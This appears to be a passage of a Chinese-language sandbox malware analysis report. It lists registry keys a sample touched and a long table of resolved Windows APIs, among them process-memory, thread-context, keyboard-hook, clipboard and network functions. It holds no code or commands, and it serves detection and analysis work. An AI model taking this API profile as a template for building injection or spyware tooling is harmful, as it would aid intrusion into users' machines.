HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\UseFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\DmReg.dll
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B07090C-8DBA-1467-87D6-ABE0F55817D2}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\LoadDebugRuntime
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\ForceDriverFlagsOff
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\Drivers\SoftwareOnly
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Video\{3A7BC9EC-2E2A-4F66-906C-5C7B51408F78}\0000\InstalledDisplayDrivers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)

修改的注册表键 无信息

删除的注册表键 无信息

API解析

kernel32.dll.IsProcessorFeaturePresent
cryptbase.dll.SystemFunction036
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetModuleHandleA
kernel32.dll.GetProcAddress
ntdll.dll.RtlAllocateHeap
ntdll.dll.RtlReAllocateHeap
ntdll.dll.RtlFreeHeap
kernel32.dll.CloseHandle
kernel32.dll.CreateFileW
kernel32.dll.DeleteCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.ExitProcess
kernel32.dll.FindClose
kernel32.dll.FindFirstFileExW
kernel32.dll.FindNextFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.FreeLibrary
kernel32.dll.GetACP
kernel32.dll.GetCPInfo
kernel32.dll.GetCommandLineA
kernel32.dll.GetCommandLineW
kernel32.dll.GetConsoleMode
kernel32.dll.GetConsoleOutputCP
kernel32.dll.GetCurrentProcess
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetCurrentThreadId
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.GetFileType
kernel32.dll.GetLastError
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetModuleHandleExW
kernel32.dll.GetModuleHandleW
kernel32.dll.GetOEMCP
kernel32.dll.GetProcessHeap
kernel32.dll.GetStartupInfoW
kernel32.dll.GetStdHandle
kernel32.dll.GetStringTypeW
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.HeapReAlloc
kernel32.dll.HeapSize
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.InitializeSListHead
kernel32.dll.InterlockedFlushSList
kernel32.dll.IsDebuggerPresent
kernel32.dll.IsValidCodePage
kernel32.dll.LCMapStringW
kernel32.dll.LeaveCriticalSection
kernel32.dll.LoadLibraryExW
kernel32.dll.MultiByteToWideChar
kernel32.dll.QueryPerformanceCounter
kernel32.dll.RaiseException
kernel32.dll.ReadConsoleW
kernel32.dll.ReadFile
kernel32.dll.RtlUnwind
kernel32.dll.SetEndOfFile
kernel32.dll.SetFilePointerEx
kernel32.dll.SetLastError
kernel32.dll.SetStdHandle
kernel32.dll.SetUnhandledExceptionFilter
kernel32.dll.TerminateProcess
kernel32.dll.TlsAlloc
kernel32.dll.TlsFree
kernel32.dll.TlsGetValue
kernel32.dll.TlsSetValue
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.WideCharToMultiByte
kernel32.dll.WriteConsoleW
kernel32.dll.WriteFile
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.FlsAlloc
kernel32.dll.FlsSetValue
kernel32.dll.FlsGetValue
kernel32.dll.LCMapStringEx
kernel32.dll.AreFileApisANSI
kernel32.dll.OpenEventA
kernel32.dll.CreateEventA
wininet.dll.InternetOpenA
wininet.dll.InternetConnectA
wininet.dll.HttpOpenRequestA
wininet.dll.InternetSetOptionA
wininet.dll.HttpSendRequestA
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
wininet.dll.InternetReadFile
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
gdi32.dll.GetLayout
gdi32.dll.GdiRealizationInfo
gdi32.dll.FontIsLinked
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
gdi32.dll.GetTextFaceAliasW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
advapi32.dll.RegQueryValueExA
advapi32.dll.RegEnumKeyExW
gdi32.dll.GetTextExtentExPointWPri
comctl32.dll.RegisterClassNameW
uxtheme.dll.EnableThemeDialogTexture
uxtheme.dll.OpenThemeData
ole32.dll.CoInitializeEx
ole32.dll.CoUninitialize
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoRevokeInitializeSpy
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
gdi32.dll.GetFontAssocStatus
oleaut32.dll.SysAllocString
oleaut32.dll.SysStringLen
oleaut32.dll.SysFreeString
kernel32.dll.TryEnterCriticalSection
kernel32.dll.SetCriticalSectionSpinCount
kernel32.dll.IsWow64Process
ntdll.dll.ZwOpenKey
ntdll.dll.ZwOpenKeyEx
ntdll.dll.ZwQueryKey
ntdll.dll.ZwQueryValueKey
ntdll.dll.ZwClose
dmreg.dll.bneizV
ntdll.dll.ZwProtectVirtualMemory
kernel32.dll.CreateWaitableTimerA
kernel32.dll.SetWaitableTimer
user32.dll.MsgWaitForMultipleObjects
kernel32.dll.SetFileAttributesA
kernel32.dll.RemoveDirectoryA
kernel32.dll.GetSystemTime
kernel32.dll.FileTimeToSystemTime
kernel32.dll.GetProcessTimes
kernel32.dll.GetThreadTimes
kernel32.dll.GlobalReAlloc
kernel32.dll.UnmapViewOfFile
kernel32.dll.MapViewOfFile
kernel32.dll.GetHandleInformation
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.ReleaseMutex
kernel32.dll.OpenMutexA
kernel32.dll.GetDiskFreeSpaceExA
kernel32.dll.CreateMutexA
kernel32.dll.ExitThread
kernel32.dll.SetProcessAffinityMask
kernel32.dll.GetProcessAffinityMask
kernel32.dll.VirtualProtect
kernel32.dll.GetPrivateProfileStringA
kernel32.dll.WritePrivateProfileStringA
kernel32.dll.GetPrivateProfileSectionNamesA
kernel32.dll.GetPrivateProfileSectionA
kernel32.dll.SuspendThread
kernel32.dll.InterlockedExchangeAdd
kernel32.dll.lstrcmpA
kernel32.dll.EnumResourceLanguagesA
kernel32.dll.ConvertDefaultLocale
kernel32.dll.GlobalDeleteAtom
kernel32.dll.GlobalAddAtomA
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.LocalAlloc
kernel32.dll.CreateDirectoryA
kernel32.dll.GetFileTime
kernel32.dll.FindNextFileA
kernel32.dll.GetVersionExA
kernel32.dll.GetThreadLocale
kernel32.dll.GlobalHandle
kernel32.dll.LocalReAlloc
kernel32.dll.GlobalFlags
kernel32.dll.lstrcmpW
kernel32.dll.GlobalFindAtomA
kernel32.dll.GlobalGetAtomNameA
kernel32.dll.FreeResource
kernel32.dll.GetLocalTime
kernel32.dll.GetCurrentDirectoryA
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.GetProcessId
kernel32.dll.VirtualFreeEx
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetSystemTimes
kernel32.dll.GetSystemDirectoryA
kernel32.dll.GetLocaleInfoA
kernel32.dll.SetThreadExecutionState
kernel32.dll.MoveFileA
kernel32.dll.CopyFileA
kernel32.dll.InterlockedCompareExchange
kernel32.dll.Beep
kernel32.dll.MulDiv
kernel32.dll.InterlockedExchange
kernel32.dll.GlobalAlloc
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.GlobalFree
kernel32.dll.FormatMessageA
kernel32.dll.LocalFree
kernel32.dll.GetSystemInfo
kernel32.dll.IsBadReadPtr
kernel32.dll.SetProcessWorkingSetSize
kernel32.dll.LockResource
kernel32.dll.GetSystemDirectoryW
kernel32.dll.SetFilePointer
kernel32.dll.GetFileSize
kernel32.dll.VirtualProtectEx
kernel32.dll.SetThreadContext
kernel32.dll.GetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.VirtualQueryEx
kernel32.dll.GetCurrentThread
kernel32.dll.CreatePipe
kernel32.dll.CreateProcessA
kernel32.dll.DeviceIoControl
kernel32.dll.QueryDosDeviceW
kernel32.dll.FindFirstVolumeW
kernel32.dll.FindNextVolumeW
kernel32.dll.FindVolumeClose
kernel32.dll.Process32First
kernel32.dll.Process32Next
kernel32.dll.DeleteFileA
kernel32.dll.CreateFileA
kernel32.dll.GetTempPathA
kernel32.dll.GetLongPathNameA
kernel32.dll.WaitForMultipleObjects
kernel32.dll.ResumeThread
kernel32.dll.QueryPerformanceFrequency
kernel32.dll.lstrcpyA
kernel32.dll.lstrcatA
kernel32.dll.CreateThread
kernel32.dll.SetEnvironmentVariableA
kernel32.dll.WriteConsoleA
kernel32.dll.GetLocaleInfoW
kernel32.dll.GetDriveTypeA
kernel32.dll.GetEnvironmentStrings
kernel32.dll.FreeEnvironmentStringsA
kernel32.dll.IsValidLocale
kernel32.dll.EnumSystemLocalesA
kernel32.dll.GetUserDefaultLCID
kernel32.dll.GetTimeZoneInformation
kernel32.dll.GetConsoleCP
kernel32.dll.GetStringTypeA
kernel32.dll.GetStartupInfoA
kernel32.dll.SetHandleCount
kernel32.dll.LCMapStringA
kernel32.dll.HeapCreate
kernel32.dll.HeapDestroy
kernel32.dll.WaitForSingleObjectEx
kernel32.dll.SetEvent
kernel32.dll.TerminateThread
kernel32.dll.LoadLibraryA
kernel32.dll.CreateFileMappingA
kernel32.dll.Sleep
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualFree
kernel32.dll.FlushInstructionCache
kernel32.dll.WaitForSingleObject
kernel32.dll.GetExitCodeThread
kernel32.dll.LoadLibraryExA
kernel32.dll.FindResourceA
kernel32.dll.LoadResource
kernel32.dll.SizeofResource
kernel32.dll.IsDBCSLeadByte
kernel32.dll.GetModuleFileNameA
kernel32.dll.VirtualQuery
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Module32First
kernel32.dll.Module32Next
kernel32.dll.GetFileAttributesA
kernel32.dll.GetTickCount
kernel32.dll.InterlockedDecrement
kernel32.dll.InterlockedIncrement
kernel32.dll.InitializeCriticalSection
kernel32.dll.lstrlenA
kernel32.dll.lstrcmpiA
kernel32.dll.CompareStringW
kernel32.dll.CompareStringA
kernel32.dll.lstrlenW
kernel32.dll.GetVersion
kernel32.dll.FindFirstFileA
kernel32.dll.LockFile
kernel32.dll.UnlockFile
kernel32.dll.DuplicateHandle
kernel32.dll.GetVolumeInformationA
kernel32.dll.GetFullPathNameA
kernel32.dll.SetErrorMode
advapi32.dll.RegEnumValueA
advapi32.dll.RegEnumKeyA
advapi32.dll.RegOpenKeyA
advapi32.dll.GetTokenInformation
advapi32.dll.OpenProcessToken
advapi32.dll.LookupPrivilegeValueA
advapi32.dll.AdjustTokenPrivileges
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegQueryInfoKeyA
advapi32.dll.RegSetValueExA
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegCreateKeyExA
advapi32.dll.RegDeleteValueA
advapi32.dll.RegDeleteKeyA
advapi32.dll.RegQueryValueA
comdlg32.dll.GetFileTitleA
gdi32.dll.CreateRoundRectRgn
gdi32.dll.CreateEllipticRgn
gdi32.dll.CreateSolidBrush
gdi32.dll.CreatePen
gdi32.dll.MoveToEx
gdi32.dll.LineTo
gdi32.dll.SetBkMode
gdi32.dll.DPtoLP
gdi32.dll.CreateBitmap
gdi32.dll.GetMapMode
gdi32.dll.SetMapMode
gdi32.dll.SetBkColor
gdi32.dll.CreateDIBSection
gdi32.dll.ExtCreateRegion
gdi32.dll.GetPixel
gdi32.dll.SetDIBits
gdi32.dll.EnumFontFamiliesExA
gdi32.dll.CreateFontIndirectA
gdi32.dll.SetTextColor
gdi32.dll.BitBlt
gdi32.dll.CreateCompatibleDC
gdi32.dll.CreateCompatibleBitmap
gdi32.dll.SelectObject
gdi32.dll.DeleteDC
gdi32.dll.GetObjectA
gdi32.dll.GetStockObject
gdi32.dll.SelectPalette
gdi32.dll.RealizePalette
gdi32.dll.GetDIBits
gdi32.dll.GetDeviceCaps
gdi32.dll.CreateRectRgn
gdi32.dll.CombineRgn
gdi32.dll.DeleteObject
gdi32.dll.ExtTextOutA
gdi32.dll.CreateRectRgnIndirect
gdi32.dll.GetClipBox
gdi32.dll.SaveDC
gdi32.dll.RestoreDC
gdi32.dll.SetStretchBltMode
gdi32.dll.PtVisible
gdi32.dll.RectVisible
gdi32.dll.TextOutA
gdi32.dll.Escape
gdi32.dll.SetViewportOrgEx
gdi32.dll.OffsetViewportOrgEx
gdi32.dll.SetViewportExtEx
gdi32.dll.ScaleViewportExtEx
gdi32.dll.SetWindowExtEx
gdi32.dll.ScaleWindowExtEx
gdi32.dll.ExtSelectClipRgn
gdi32.dll.SetDIBitsToDevice
ole32.dll.CoRegisterMessageFilter
ole32.dll.OleInitialize
ole32.dll.CoFreeUnusedLibraries
ole32.dll.OleUninitialize
ole32.dll.OleFlushClipboard
ole32.dll.CoRevokeClassObject
ole32.dll.OleIsCurrentClipboard
ole32.dll.CoInitializeSecurity
ole32.dll.CoSetProxyBlanket
ole32.dll.CoInitialize
ole32.dll.StringFromGUID2
ole32.dll.CoCreateInstance
ole32.dll.CoTaskMemFree
ole32.dll.CoTaskMemRealloc
ole32.dll.CoTaskMemAlloc
oleacc.dll.CreateStdAccessibleObject
oleacc.dll.LresultFromObject
oleaut32.dll.#4
oleaut32.dll.#162
oleaut32.dll.#277
oleaut32.dll.#163
oleaut32.dll.#186
oleaut32.dll.#161
oleaut32.dll.#2
oleaut32.dll.#7
oleaut32.dll.#6
oleaut32.dll.#12
oleaut32.dll.#9
oleaut32.dll.#8
oleaut32.dll.#184
oledlg.dll.#8
shlwapi.dll.UrlUnescapeA
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathIsUNCA
shlwapi.dll.PathStripToRootA
shlwapi.dll.PathFindExtensionA
user32.dll.InvalidateRect
user32.dll.SetWindowRgn
user32.dll.GetWindowRect
user32.dll.ClientToScreen
user32.dll.GetClientRect
user32.dll.GetWindowLongA
user32.dll.IsWindow
user32.dll.GetForegroundWindow
user32.dll.IsWindowVisible
user32.dll.SetWindowTextA
user32.dll.PtInRect
user32.dll.PostQuitMessage
user32.dll.SetWindowLongA
user32.dll.KillTimer
user32.dll.IsIconic
user32.dll.DefWindowProcA
user32.dll.RegisterClassExA
user32.dll.LoadCursorA
user32.dll.UnregisterClassA
user32.dll.DispatchMessageA
user32.dll.TranslateMessage
user32.dll.GetMessageA
user32.dll.SetTimer
user32.dll.UpdateWindow
user32.dll.OpenInputDesktop
user32.dll.SetThreadDesktop
user32.dll.CloseDesktop
user32.dll.SetClassLongA
user32.dll.GetClassLongA
user32.dll.MessageBoxA
user32.dll.IsWindowUnicode
user32.dll.CreateWindowExA
user32.dll.AdjustWindowRectEx
user32.dll.MessageBoxW
user32.dll.ReleaseDC
user32.dll.GetWindowDC
user32.dll.GetDesktopWindow
user32.dll.GetParent
user32.dll.DrawIcon
user32.dll.GetIconInfo
user32.dll.DrawTextW
user32.dll.GetCaretPos
user32.dll.GetAsyncKeyState
user32.dll.SystemParametersInfoA
user32.dll.SetForegroundWindow
user32.dll.ReleaseCapture
user32.dll.SetCursorPos
user32.dll.GetCursorPos
user32.dll.GetMessagePos
user32.dll.ChangeDisplaySettingsA
user32.dll.ExitWindowsEx
user32.dll.ClipCursor
user32.dll.PeekMessageA
user32.dll.CloseClipboard
user32.dll.SetClipboardData
user32.dll.EmptyClipboard
user32.dll.GetMessageExtraInfo
user32.dll.MapVirtualKeyA
user32.dll.GetPropA
user32.dll.OpenClipboard
user32.dll.GetWindowTextA
user32.dll.CharNextA
user32.dll.CharUpperA
user32.dll.GetClassLongW
user32.dll.FindWindowA
user32.dll.MoveWindow
user32.dll.ShowWindow
user32.dll.SetWindowPos
user32.dll.WindowFromPoint
user32.dll.GetWindow
user32.dll.EnumWindows
user32.dll.EnumDisplaySettingsA
user32.dll.SetWindowsHookExW
user32.dll.PostMessageA
user32.dll.GetMessageW
user32.dll.DestroyWindow
user32.dll.TranslateAcceleratorA
user32.dll.GetWindowThreadProcessId
user32.dll.CopyIcon
user32.dll.GetWindowPlacement
user32.dll.GetKeyState
user32.dll.GetActiveWindow
user32.dll.CallNextHookEx
user32.dll.SetWindowLongW
user32.dll.DestroyCursor
user32.dll.CallWindowProcA
user32.dll.GetMessageTime
user32.dll.SetWindowsHookExA
user32.dll.UnhookWindowsHookEx
user32.dll.UnloadKeyboardLayout
user32.dll.BeginPaint
user32.dll.EndPaint
user32.dll.GetDC
user32.dll.FillRect
user32.dll.DrawTextA
user32.dll.IsZoomed
user32.dll.GetFocus
user32.dll.GetClassNameW
user32.dll.DrawTextExA
user32.dll.SendMessageA
user32.dll.SetRect
user32.dll.AttachThreadInput
user32.dll.GetSubMenu
user32.dll.GetMenuItemCount
user32.dll.GetMenuItemID
user32.dll.GetMenuState
user32.dll.CheckMenuItem
user32.dll.EnableMenuItem
user32.dll.ModifyMenuA
user32.dll.LoadBitmapA
user32.dll.GetMenuCheckMarkDimensions
user32.dll.SetMenuItemBitmaps
user32.dll.ValidateRect
user32.dll.SetCursor
user32.dll.GetLastActivePopup
user32.dll.RegisterClipboardFormatA
user32.dll.CopyRect
user32.dll.TabbedTextOutA
user32.dll.GrayStringA
user32.dll.GetSysColor
user32.dll.GetSysColorBrush
user32.dll.RegisterClassA
user32.dll.GetClassInfoA
user32.dll.GetClassInfoExA
user32.dll.GetMenu
user32.dll.MapWindowPoints
user32.dll.GetTopWindow
user32.dll.GetDlgItem
user32.dll.SetActiveWindow
user32.dll.GetCapture
user32.dll.WinHelpA
user32.dll.SendDlgItemMessageA
user32.dll.LoadIconA
user32.dll.RegisterWindowMessageA
user32.dll.IsDialogMessageA
user32.dll.PostThreadMessageA
user32.dll.EndDialog
user32.dll.GetNextDlgTabItem
user32.dll.CreateDialogIndirectParamA
user32.dll.DestroyMenu
user32.dll.EnableWindow
user32.dll.SetFocus
user32.dll.GetDoubleClickTime
user32.dll.GetClassNameA
user32.dll.IsWindowEnabled
user32.dll.GetClipboardData
user32.dll.SetPropA
user32.dll.GetWindowLongW
user32.dll.ScreenToClient
user32.dll.FindWindowW
user32.dll.FindWindowExA
user32.dll.SetWindowTextW
user32.dll.GetDlgCtrlID
user32.dll.GetKeyboardLayout
user32.dll.RedrawWindow
user32.dll.RemovePropA
user32.dll.SendInput
wininet.dll.InternetGetLastResponseInfoA
wininet.dll.InternetSetStatusCallback
wininet.dll.InternetSetFilePointer
wininet.dll.InternetWriteFile
wininet.dll.InternetOpenUrlA
wininet.dll.InternetQueryDataAvailable
wininet.dll.InternetSetOptionExA
wininet.dll.InternetQueryOptionA
wininet.dll.InternetCanonicalizeUrlA
wininet.dll.InternetCrackUrlA
winspool.drv.DocumentPropertiesA
winspool.drv.OpenPrinterA
winspool.drv.ClosePrinter
ws2_32.dll.#11
ws2_32.dll.#111
ws2_32.dll.#7
ws2_32.dll.#4
ws2_32.dll.#9
ws2_32.dll.#23
ws2_32.dll.#3
ws2_32.dll.#116
ws2_32.dll.#115
ws2_32.dll.#14
ws2_32.dll.#17
ws2_32.dll.#20
ws2_32.dll.#21
ws2_32.dll.#8
ws2_32.dll.#19
ws2_32.dll.#16
ws2_32.dll.#151
ws2_32.dll.#18
ws2_32.dll.#10
ws2_32.dll.#52
kernel32.dll.CreateActCtxW
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
sxs.dll.SxsOleAut32RedirectTypeLibrary
advapi32.dll.RegOpenKeyW
advapi32.dll.RegQueryValueW
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
advapi32.dll.CryptAcquireContextA
cryptsp.dll.CryptAcquireContextA
advapi32.dll.CryptCreateHash
cryptsp.dll.CryptCreateHash
advapi32.dll.CryptHashData
cryptsp.dll.CryptHashData
advapi32.dll.CryptGetHashParam
cryptsp.dll.CryptGetHashParam
user32.dll.wvsprintfA
advapi32.dll.CryptDestroyHash
cryptsp.dll.CryptDestroyHash
advapi32.dll.CryptReleaseContext
cryptsp.dll.CryptReleaseContext
iphlpapi.dll.GetAdaptersInfo
d3d9.dll.Direct3DCreate9
kernel32.dll.Wow64EnableWow64FsRedirection
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.GetLocaleInfoEx
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
oleaut32.dll.#283
oleaut32.dll.#284
oleaut32.dll.#500